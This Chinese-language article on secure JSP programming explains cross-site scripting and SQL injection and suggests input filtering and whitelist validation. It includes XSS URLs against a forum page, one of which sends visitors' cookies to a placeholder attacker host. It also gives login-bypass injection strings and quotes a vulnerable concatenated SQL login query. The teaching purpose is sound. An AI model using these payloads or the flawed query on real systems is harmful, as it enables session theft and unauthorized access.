JSP安全编程实例浅析(1)(2)

三、长盛不衰的跨站脚本

跨站脚本Cross Site Scripting）攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本，窃取浏览此页面的用户的隐私，改变用户的设置，破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响，但对客户端的安全构成严重的威胁。

以仿动网的阿菜论坛beta-1）举个最简单的例子。当我们提交 http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>alert(document.cookie) 便能弹出包含自己cookie信息的对话框。而提交http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.163.com'就能重定向到网易。

由于在返回“name”变量的值给客户端时，脚本没有进行任何编码或过滤恶意代码，当用户访问嵌入恶意“name”变量数据链接时，会导致脚本代码在用户浏览器上执行，可能导致用户隐私泄露等后果。比如下面的链接：

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='

http://www.hackersite.com/xxx.xxx?'+document.cookie

xxx.xxx用于收集后边跟的参数，而这里参数指定的是document.cookie，也就是访问此链接的用户的cookie。在ASP世界中，很多人已经把偷cookie的技术练得炉火纯青了。在JSP里，读取cookie也不是难事。当然，跨站脚本从来就不会局限于偷cookie这一项功能，相信大家都有一定了解，这里就不展开了。

对所有动态页面的输入和输出都应进行编码，可以在很大程度上避免跨站脚本的攻击。遗憾的是，对所有不可信数据编码是资源密集型的工作，会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤，比如下面的代码就把危险的字符进行替换：

＜% String message = request.getParameter("message"); 
message = message.replace ('＜','_'); 
message = message.replace ('＞','_'); 
message = message.replace ('"','_'); 
message = message.replace ('\'','_'); 
message = message.replace ('%','_'); 
message = message.replace (';','_'); 
message = message.replace ('(','_'); 
message = message.replace (')','_'); 
message = message.replace ('&','_'); 
message = message.replace ('+','_'); %＞

更积极的方式是利用正则表达式只允许输入指定的字符：

public boolean isValidInput(String str) 
{ 
if(str.matches("[a-z0-9]+")) return true; 
else return false; 
}

四、时刻牢记SQL注入

一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安全编程的习惯。著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的数据库为MySQL）：

Statement stmt = conn.createStatement(); 
String checkUser = "select * from login where username = '
"+ userName +"'and userpassword = '"+ userPassword +"'"; 
ResultSet rs = stmt.executeQuery(checkUser); 
if(rs.next()) 
response.sendRedirect("SuccessLogin.jsp"); 
else 
response.sendRedirect("FailureLogin.jsp");

这样使得尽信书的人长期使用这样先天“带洞”的登录代码。如果数据库里存在一个名叫“jack”的用户，那么在不知道密码的情况下至少有下面几种方法可以登录：

用户名：jack

密码：' or 'a'='a

用户名：jack

密码：' or 1=1/*

用户名：jack' or 1=1/*

密码：任意）

lybbs凌云论坛）ver 2.9.Server在LogInOut.java中是这样对登录提交的数据进行检查的：

if(s.equals("") ││ s1.equals("")) 
throw new UserException("用户名或密码不能空。"); 
if(s.indexOf("'") != -1 ││ s.indexOf("\"") != -1 ││ s.ind
exOf(",") != -1 ││ s.indexOf("\\") != -1) 
throw new UserException("用户名不能包括 ' \" \\ , 等非法字符。"); 
if(s1.indexOf("'") != -1 ││ s1.indexOf("\"") != -1 ││ s1.ind
exOf("*") != -1 ││ s1.indexOf("\\") != -1) 
throw new UserException("密码不能包括 ' \" \\ * 等非法字符。"); 
if(s.startsWith("　") ││ s1.startsWith("　")) 
throw new UserException("用户名或密码中不能用空格。");

但是我不清楚为什么他只对密码而不对用户名过滤星号。另外，正斜杠似乎也应该被列到“黑名单”中。我还是认为用正则表达式只允许输入指定范围内的字符来得干脆。

这里要提醒一句：不要以为可以凭借某些数据库系统天生的“安全性”就可以有效地抵御所有的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc = On”的人上了一课。